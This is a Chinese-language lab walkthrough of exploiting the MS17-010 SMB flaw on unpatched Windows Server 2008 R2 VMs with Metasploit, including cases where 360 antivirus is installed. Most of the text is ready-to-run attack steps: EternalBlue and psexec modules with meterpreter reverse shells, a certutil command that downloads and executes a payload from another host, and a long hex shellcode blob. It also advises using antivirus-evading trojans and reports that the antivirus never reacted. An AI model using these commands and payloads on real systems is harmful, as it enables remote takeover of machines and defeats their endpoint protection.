前言
在去年的時候做過一次ms17010的總結,但是現在用起來發現不夠詳細,所以從新來總結一下。文章分爲兩個大部分,每個部分分爲兩種情況。
環境搭建
這裏使用的是win2008r2,沒有打補丁,之後鏈接克隆兩臺虛擬機
kali 192.168.164.155
靶機1 192.168.164.156
靶機2 192.168.164.161(丟一個360的安裝包進去,等會要用)
靶機2還要開啓命名管道的匿名訪問
打開cmd 執行gpedit.msc,在計算機配置->windwos設置->安全設置->本地策略->安全選項,修改限制對命名管道和共享的匿名訪問爲已禁用
之後重啓靶機2
漏洞
首先打開msf,搜索17010相關的模塊
msfconsole
search 17-010
漏洞檢測
auxiliary/scanner/smb/smb_ms17_010
漏洞檢測方法
use auxiliary/scanner/smb/smb_ms17_010
之後設置一下目標ip和線程即可,這裏因爲已知ip和存在漏洞就不演示了
漏洞利用常使用的是
auxiliary/admin/smb/ms17_010_command
exploit/windows/smb/ms17_010_eternalblue
exploit/windows/smb/ms17_010_psexec
這裏的第一個和第三個模塊需要目標開啓明明管道,並且比較穩定,第二個模塊只要存在漏洞即可,但是會有概率把目標打藍屏,而且殺軟攔截也會比較嚴格,如果有殺軟就基本可以放棄這個模塊了
無殺軟情況
無殺軟的話可以先使用auxiliary/admin/smb/ms17_010_command模塊探測一下是否可以使用命名管道
use auxiliary/admin/smb/ms17_010_command
set rhosts 192.168.164.156 192.168.164.161
set command tasklist
show options
run
如果命令執行成功的話就可以優先考慮
auxiliary/admin/smb/ms17_010_command
exploit/windows/smb/ms17_010_psexec
兩個模塊進行利用,第一個模塊執行命令遠程下載,之後在執行下載的muma,
第二個模塊psexec直接設置目標的地址,之後執行就可以了
exploit/windows/smb/ms17_010_eternalblue不建議使用,有概率使目標藍屏
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.164.156
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.164.155
run
有殺軟情況
這裏就對模塊進行測試,某衛士對不同模塊的反應,雙擊靶機2上的360安裝包,之後進行安裝
首先是exploit/windows/smb/ms17_010_eternalblue
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.164.161
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.164.155
run
msf這邊很快就“完成了”攻擊,
exploit/windows/smb/ms17_010_psexec模塊
use exploit/windows/smb/ms17_010_psexec
set rhosts 192.168.164.161
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.164.155
run
抓取密碼
這邊全程某衛士都沒有反應
auxiliary/admin/smb/ms17_010_command模塊
首先要準備好免殺muma,之後保存到vps上,這裏爲了方便就保存在局域網內,
再打開一個msf,監聽shell
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.164.155
set lport 443
run
use auxiliary/admin/smb/ms17_010_command
set command certutil -urlcache -split -f http://192.168.164.138/met.exe %temp%/abc.exe
set rhosts 192.168.164.161
run
set command "%temp%/abc.exe fc4883e4f0e8cc000000415141505251564831d265488b5260488b5218488b5220488b7250480fb74a4a4d31c94831c0ac3c617c022c2041c1c90d4101c1e2ed524151488b52208b423c4801d0668178180b020f85720000008b80880000004885c074674801d0508b4818448b40204901d0e35648ffc9418b34884801d64d31c94831c0ac41c1c90d4101c138e075f14c034c24084539d175d858448b40244901d066418b0c48448b401c4901d0418b04884801d0415841585e595a41584159415a4883ec204152ffe05841595a488b12e94bffffff5d49be7773325f3332000041564989e64881eca00100004989e549bc020001bbc0a8a49b41544989e44c89f141ba4c772607ffd54c89ea68010100005941ba29806b00ffd56a0a415e50504d31c94d31c048ffc04889c248ffc04889c141baea0fdfe0ffd54889c76a1041584c89e24889f941ba99a57461ffd585c0740a49ffce75e5e8930000004883ec104889e24d31c96a0441584889f941ba02d9c85fffd583f8007e554883c4205e89f66a404159680010000041584889f24831c941ba58a453e5ffd54889c34989c74d31c94989f04889da4889f941ba02d9c85fffd583f8007d2858415759680040000041586a005a41ba0b2f0f30ffd5575941ba756e4d61ffd549ffcee93cffffff4801c34829c64885f675b441ffe7586a005949c7c2f0b5a256ffd5"
run
某衛士也是全程無反應
如果自己的服務器沒有訪問日誌的話就要檢查下模板是否出網或者是否被攔截或者被殺,有訪問日誌的話,要等幾分鐘之後再次去執行命令運行
參考文章
https://docs.microsoft.com/zh-cn/windows/security/threat-protection/security-policy-settings/network-access-restrict-anonymous-access-to-named-pipes-and-shares
http://t3ngyu.leanote.com/post/MS17-010
https://jingyan.baidu.com/article/09ea3edec478a981afde3941.html